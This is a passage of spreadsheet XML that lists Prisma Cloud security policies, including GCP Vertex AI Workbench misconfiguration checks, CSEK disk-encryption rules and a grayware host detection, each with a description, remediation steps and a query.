        <is>
          <t>09f02f06-c66c-48c4-b8fa-85e1d05cc321</t>
        </is>
      </c>
      <c r="AI3006" t="inlineStr">
        <is>
          <t>9fe0cc32-90af-44a2-ba94-3eea93380af1</t>
        </is>
      </c>
      <c r="AJ3006" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3006" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3007">
      <c r="A3007" t="inlineStr">
        <is>
          <t>NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3007" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3007" s="2" t="inlineStr"/>
      <c r="D3007" t="inlineStr"/>
      <c r="E3007" t="inlineStr"/>
      <c r="F3007" t="inlineStr"/>
      <c r="G3007" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3007" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3007" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench Instance has Integrity monitoring disabled</t>
        </is>
      </c>
      <c r="L3007" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3007" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3007" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3007" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3007" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3007" t="inlineStr">
        <is>
          <t>CA</t>
        </is>
      </c>
      <c r="R3007" t="inlineStr">
        <is>
          <t>Continuous Monitoring</t>
        </is>
      </c>
      <c r="S3007" t="inlineStr"/>
      <c r="T3007" t="b">
        <v>0</v>
      </c>
      <c r="U3007" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3007" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-workbench-instance</t>
        </is>
      </c>
      <c r="W3007" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench Instances that have Integrity monitoring disabled.
Integrity Monitoring continuously monitors the boot integrity, kernel integrity, and persistent data integrity of the underlying VM of the shielded workbench instances. It detects unauthorized modifications or tampering, enhancing security by verifying the trusted state of VM components throughout their lifecycle. Integrity monitoring provides active alerts, enabling administrators to respond to integrity failures and prevent compromised nodes from being deployed into the cluster.
It is recommended to enable Integrity Monitoring for Workbench instances to detect and mitigate advanced threat, such as rootkits and bootkit malware.</t>
        </is>
      </c>
      <c r="X3007" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'Notebooks', go to 'Workbench'
4. Under 'INSTANCES' tab, select 'VIEW' as 'INSTANCES'
5. Click on the alerting instance
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Shielded VM', enable 'Turn on vTPM'
10. Enable 'Turn on Integrity Monitoring'
11. Click on 'Save'
12. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3007" t="inlineStr"/>
      <c r="Z3007" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-workbench-instance' AND json.rule = state equals "ACTIVE" AND shieldedInstanceConfig.enableIntegrityMonitoring is false</t>
        </is>
      </c>
      <c r="AA3007" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3007" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3007" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1293</t>
        </is>
      </c>
      <c r="AD3007" t="b">
        <v>1</v>
      </c>
      <c r="AE3007" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3007" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>01df5ca7-2413-4cde-8ccf-1c3beda595a5</t>
        </is>
      </c>
      <c r="AI3007" t="inlineStr">
        <is>
          <t>815abaea-62b2-4c90-a126-57bc0de986fa</t>
        </is>
      </c>
      <c r="AJ3007" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3007" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3008">
      <c r="A3008" t="inlineStr"/>
      <c r="B3008" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3008" s="2" t="inlineStr"/>
      <c r="D3008" t="inlineStr"/>
      <c r="E3008" t="inlineStr"/>
      <c r="F3008" t="inlineStr"/>
      <c r="G3008" t="b">
        <v>1</v>
      </c>
      <c r="H30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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3008" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3008" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench Instance has vTPM disabled</t>
        </is>
      </c>
      <c r="L3008" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3008" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3008" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3008" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3008" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3008" t="inlineStr"/>
      <c r="R3008" t="inlineStr"/>
      <c r="S3008" t="inlineStr"/>
      <c r="T3008" t="b">
        <v>0</v>
      </c>
      <c r="U3008" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3008" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-workbench-instance</t>
        </is>
      </c>
      <c r="W3008" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench Instances that have the Virtual Trusted Platform Module (vTPM) feature disabled.
The Virtual Trusted Platform Module (vTPM) validates the guest VM's pre-boot and boot integrity and provides key generation and protection. The root keys of the vTPM, as well as the keys it generates, cannot leave the vTPM, thereby offering enhanced protection against compromised operating systems or highly privileged project administrators.
It is recommended to enable the virtual TPM device on GCP Vertex AI Workbench Instances to support measured boot and other OS security features that require a TPM.</t>
        </is>
      </c>
      <c r="X3008" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'Notebooks', go to 'Workbench'
4. Under 'INSTANCES' tab, select 'VIEW' as 'INSTANCES'
5. Click on the alerting instance
6. Under the 'SYSTEM' tab, in front of 'VM details', click on the 'View in Compute Engine' link
7. Stop the VM by clicking on the 'STOP' button. Click the 'STOP' button on the confirmation dialogue.
8. Once the the VM has been stopped, click on the 'EDIT' button
9. Under 'Shielded VM', enable 'Turn on vTPM'
10. Click on 'Save'
11. Click on 'START/RESUME' from the top menu</t>
        </is>
      </c>
      <c r="Y3008" t="inlineStr"/>
      <c r="Z3008" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-workbench-instance' AND json.rule = state equals "ACTIVE" AND shieldedInstanceConfig.enableVtpm is false</t>
        </is>
      </c>
      <c r="AA3008" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3008" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3008" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1292</t>
        </is>
      </c>
      <c r="AD3008" t="b">
        <v>1</v>
      </c>
      <c r="AE3008" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3008" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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8" t="inlineStr">
        <is>
          <t>cf792c72-ddbd-4b74-b0be-16d54a2df838</t>
        </is>
      </c>
      <c r="AI3008" t="inlineStr">
        <is>
          <t>d540b022-6ac2-43e7-834e-0885600b1d99</t>
        </is>
      </c>
      <c r="AJ3008" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3008" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3009">
      <c r="A3009" t="inlineStr"/>
      <c r="B3009" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3009" s="2" t="inlineStr"/>
      <c r="D3009" t="inlineStr"/>
      <c r="E3009" t="inlineStr"/>
      <c r="F3009" t="inlineStr"/>
      <c r="G3009" t="b">
        <v>1</v>
      </c>
      <c r="H30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09" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3009" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K3009" t="inlineStr">
        <is>
          <t>GCP Vertex AI Workbench Instance has root access enabled</t>
        </is>
      </c>
      <c r="L3009" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M3009" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3009" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3009" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3009" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3009" t="inlineStr"/>
      <c r="R3009" t="inlineStr"/>
      <c r="S3009" t="inlineStr"/>
      <c r="T3009" t="b">
        <v>0</v>
      </c>
      <c r="U3009" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3009" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-workbench-instance</t>
        </is>
      </c>
      <c r="W3009" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Workbench Instances that have root access enabled.
Enabling root access on a GCP Vertex AI Workbench instance increases the risk of unauthorized system changes, privilege escalation, and data exposure. It can also make the instance more vulnerable to attacks if not properly secured. Limiting root access and applying strict access controls are essential to reduce these risks.
It is recommended to disable root access for GCP Vertex AI Workbench Instances.</t>
        </is>
      </c>
      <c r="X3009" t="inlineStr">
        <is>
          <t>1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'Notebooks', go to 'Workbench'
4. Under 'INSTANCES' tab, select 'VIEW' as 'INSTANCES'
5. Click on the alerting instance
6. Go to the 'SOFTWARE AND SECURITY' tab
7. Under 'Modify software and security configuration', disable (uncheck) 'Root access to the instance' checkbox
8. At the bottom of the page, click 'SUBMIT'</t>
        </is>
      </c>
      <c r="Y3009" t="inlineStr"/>
      <c r="Z3009" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-workbench-instance' AND json.rule = state equals "ACTIVE" AND gceSetup.metadata.notebook-disable-root is false</t>
        </is>
      </c>
      <c r="AA3009" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3009" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3009" t="inlineStr">
        <is>
          <t>PC-GCP-GVA-1309</t>
        </is>
      </c>
      <c r="AD3009" t="b">
        <v>1</v>
      </c>
      <c r="AE3009" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3009" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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09" t="inlineStr">
        <is>
          <t>8cceeba4-533f-4e01-a54b-67816cdea80e</t>
        </is>
      </c>
      <c r="AI3009" t="inlineStr">
        <is>
          <t>74260519-8dad-4b5b-87d1-43fb9b074c65</t>
        </is>
      </c>
      <c r="AJ3009" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3009" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3010">
      <c r="A3010" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, CIS v1.0.0 (GCP), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, Rehan, CRI Profile v1.2.1, ISO 27001:2013, NIST CSF v2.0, CIS v3.0.0 (GCP) Level 2, CIS v1.2.0 (GCP), Copy of CIS Controls v8, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], jneytchev-fedramp-low, ISO 27001:2013, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS v1.1.0 (GCP), NIST CSF v2.0, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, Risk Management in Technology (RMiT), NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, PCI DSS v4.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, PCI DSS v4.0, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), ISO 27001:2013, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (GCP) Level 2, CRI Profile v1.2.1, CIS v1.3.0 (GCP), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B3010" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3010" s="2" t="inlineStr"/>
      <c r="D3010" t="inlineStr"/>
      <c r="E3010" t="inlineStr"/>
      <c r="F3010" t="inlineStr"/>
      <c r="G3010" t="b">
        <v>1</v>
      </c>
      <c r="H30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fricieri-teste-ciem-rule, jbrox-AlertRule-MSTeams-Email, mark davis test 412024, pagerduty-test, splunk-test</t>
        </is>
      </c>
      <c r="I3010" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3010" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K3010" t="inlineStr">
        <is>
          <t>GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK)-fricieri</t>
        </is>
      </c>
      <c r="L3010" t="inlineStr"/>
      <c r="M3010" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3010" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3010" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3010" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3010" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R3010" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S3010" t="inlineStr">
        <is>
          <t>fricieri</t>
        </is>
      </c>
      <c r="T3010" t="b">
        <v>0</v>
      </c>
      <c r="U3010" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3010" t="inlineStr">
        <is>
          <t>gcp-compute-disk-list</t>
        </is>
      </c>
      <c r="W3010" t="inlineStr">
        <is>
          <t>This policy identifies VM disks which are not encrypted with Customer-Supplied Encryption Keys (CSEK). If you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. It is recommended to use VM disks encrypted with CSEK for business-critical VM instances. 
Limitation: This policy might give false negatives in case VM disks are created with name prefix 'gke-'.</t>
        </is>
      </c>
      <c r="X3010" t="inlineStr">
        <is>
          <t>Currently, we can not update the encryption of an existing disk. So to fix this alert, Create a new VM disk with Encryption set to Customer supplied, migrate all required data from reported VM disk to newly created disk and delete the reported VM disk.
1. Login to GCP Portal
2. Go to Compute Engine
3. Go to Disks
4. Click on Create a disk
5. Specify other disk parameters as you desire
6. Set Encryption to Customer-supplied key
7. Provide the Key in the box
8. Select Wrapped key
9. Click on Create</t>
        </is>
      </c>
      <c r="Y3010" t="inlineStr"/>
      <c r="Z3010" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcp-compute-disk-list' AND json.rule = status equals READY and name does not start with "gke-" and diskEncryptionKey.sha256 does not exist</t>
        </is>
      </c>
      <c r="AA3010" t="inlineStr">
        <is>
          <t>Felipe Ricieri</t>
        </is>
      </c>
      <c r="AB3010" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3010" t="inlineStr"/>
      <c r="AD3010" t="b">
        <v>0</v>
      </c>
      <c r="AE3010" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3010" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>09d1083f-86d0-43c9-aa95-2f485cf990ba</t>
        </is>
      </c>
      <c r="AI3010" t="inlineStr">
        <is>
          <t>f1652347-aa74-4e95-baa0-f71c9d9c9c77</t>
        </is>
      </c>
      <c r="AJ3010" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3010" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3011">
      <c r="A3011" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, CSA CCM v.4.0.1, CSA CCM v4.0.12, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, GDPR, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, Risk Management in Technology (RMiT), CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Fedramp (Moderate), ISO/IEC 27018:2019, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), PCI DSS v4.0, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), ISO/IEC 27002:2013, CIS v1.0.0 (GCP), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, Rehan, CRI Profile v1.2.1, ISO 27001:2013, NIST CSF v2.0, CIS v3.0.0 (GCP) Level 2, CIS v1.2.0 (GCP), Copy of CIS Controls v8, NIST 800-53 Rev 5, FFIEC, NIST 800-53 Rev4, HITRUST v.9.4.2 [Deprecated], jneytchev-fedramp-low, ISO 27001:2013, Fedramp (Low), SOC 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, GDPR, Microsoft Cloud Security Benchmark v1, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27002:2013, NIST 800-53 Rev4, CIS v1.1.0 (GCP), NIST CSF v2.0, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, Risk Management in Technology (RMiT), NIST 800-53 Rev4, ISO/IEC 27018:2019, CRI Profile v2.0, PCI DSS v4.0, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, PCI DSS v4.0, Sarbanes Oxley Act (SOX), kashan ACSC Information Security Manual (ISM), ISO 27001:2013, APRA (CPS 234) Information Security, NIST CSF, NIST SP 800-171 Revision 3, SOC 2, NIST CSF, ACSC Information Security Manual (ISM), HIPAA, Fedramp (Moderate), Risk Management in Technology (RMiT), ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, ISO/IEC 27002:2013, CRI Profile v2.0, CDC NIST 800-53 Rev4, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2024.2, CIS v2.0.0 (GCP) Level 2, CRI Profile v1.2.1, CIS v1.3.0 (GCP), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, PCI DSS v3.2.1, NIST 800-53 Rev 5, kfirdaus AWS Account-CS</t>
        </is>
      </c>
      <c r="B3011" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3011" s="2" t="inlineStr"/>
      <c r="D3011" t="inlineStr"/>
      <c r="E3011" t="inlineStr"/>
      <c r="F3011" t="inlineStr"/>
      <c r="G3011" t="b">
        <v>1</v>
      </c>
      <c r="H30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fricieri-teste-ciem-rule,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11" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3011" t="inlineStr">
        <is>
          <t>gcloud-compute</t>
        </is>
      </c>
      <c r="K3011" t="inlineStr">
        <is>
          <t>GCP VM disks not encrypted with Customer-Supplied Encryption Keys (CSEK)</t>
        </is>
      </c>
      <c r="L3011" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M3011" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3011" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3011" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3011" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q3011" t="inlineStr">
        <is>
          <t>Guidelines for Cryptography</t>
        </is>
      </c>
      <c r="R3011" t="inlineStr">
        <is>
          <t>ISM-0459</t>
        </is>
      </c>
      <c r="S3011" t="inlineStr"/>
      <c r="T3011" t="b">
        <v>0</v>
      </c>
      <c r="U3011" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3011" t="inlineStr">
        <is>
          <t>gcp-compute-disk-list</t>
        </is>
      </c>
      <c r="W3011" t="inlineStr">
        <is>
          <t>This policy identifies VM disks which are not encrypted with Customer-Supplied Encryption Keys (CSEK). If you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. It is recommended to use VM disks encrypted with CSEK for business-critical VM instances. 
Limitation: This policy might give false negatives in case VM disks are created with name prefix 'gke-'.</t>
        </is>
      </c>
      <c r="X3011" t="inlineStr">
        <is>
          <t>Currently, we can not update the encryption of an existing disk. So to fix this alert, Create a new VM disk with Encryption set to Customer supplied, migrate all required data from reported VM disk to newly created disk and delete the reported VM disk.
1. Login to GCP Portal
2. Go to Compute Engine
3. Go to Disks
4. Click on Create a disk
5. Specify other disk parameters as you desire
6. Set Encryption to Customer-supplied key
7. Provide the Key in the box
8. Select Wrapped key
9. Click on Create 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-general-policies/bc-gcp-general-x</t>
        </is>
      </c>
      <c r="Y3011" t="inlineStr"/>
      <c r="Z3011" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcp-compute-disk-list' AND json.rule = status equals READY and name does not start with "gke-" and diskEncryptionKey.sha256 does not exist
{"category":"General","resourceTypes":["google_compute_disk"]}</t>
        </is>
      </c>
      <c r="AA3011" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3011" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3011" t="inlineStr">
        <is>
          <t>PC-GCP-GCE-203-CKV_GCP_37</t>
        </is>
      </c>
      <c r="AD3011" t="b">
        <v>1</v>
      </c>
      <c r="AE3011" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3011" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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11" t="inlineStr">
        <is>
          <t>952d8fdc-ad1f-4c19-ab00-1258d2745424</t>
        </is>
      </c>
      <c r="AI3011" t="inlineStr">
        <is>
          <t>f1652347-aa74-4e95-baa0-f71c9d9c9c77</t>
        </is>
      </c>
      <c r="AJ3011" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3011" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3012">
      <c r="A3012" t="inlineStr"/>
      <c r="B3012" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3012" s="2" t="inlineStr"/>
      <c r="D3012" t="inlineStr"/>
      <c r="E3012" t="inlineStr"/>
      <c r="F3012" t="inlineStr"/>
      <c r="G3012" t="b">
        <v>1</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3012" t="inlineStr">
        <is>
          <t>grayware_host</t>
        </is>
      </c>
      <c r="K3012" t="inlineStr">
        <is>
          <t>Host contains Grayware</t>
        </is>
      </c>
      <c r="L3012" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M3012" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3012" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3012" t="inlineStr">
        <is>
          <t>grayware</t>
        </is>
      </c>
      <c r="P3012" t="inlineStr">
        <is>
          <t>host</t>
        </is>
      </c>
      <c r="Q3012" t="inlineStr"/>
      <c r="R3012" t="inlineStr"/>
      <c r="S3012" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3012" t="b">
        <v>0</v>
      </c>
      <c r="U3012" t="inlineStr">
        <is>
          <t>workload_detection</t>
        </is>
      </c>
      <c r="V3012" t="inlineStr">
        <is>
          <t>grayware</t>
        </is>
      </c>
      <c r="W3012" t="inlineStr">
        <is>
          <t>Identify if grayware has been detected on a host</t>
        </is>
      </c>
      <c r="X3012" t="inlineStr">
        <is>
          <t>Including files flagged as malware in a host filesystem poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from hosts.</t>
        </is>
      </c>
      <c r="Y3012" t="inlineStr"/>
      <c r="Z3012" t="inlineStr"/>
      <c r="AA3012" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3012" t="inlineStr">
        <is>
          <t>2023-12-08 04:25:02</t>
        </is>
      </c>
      <c r="AC3012" t="inlineStr"/>
      <c r="AD3012" t="b">
        <v>1</v>
      </c>
      <c r="AE3012" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3012" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>945de5b2-e754-4c70-8065-0e3582752c3b</t>
        </is>
      </c>
      <c r="AI3012" t="inlineStr"/>
      <c r="AJ3012" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3012" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3013">
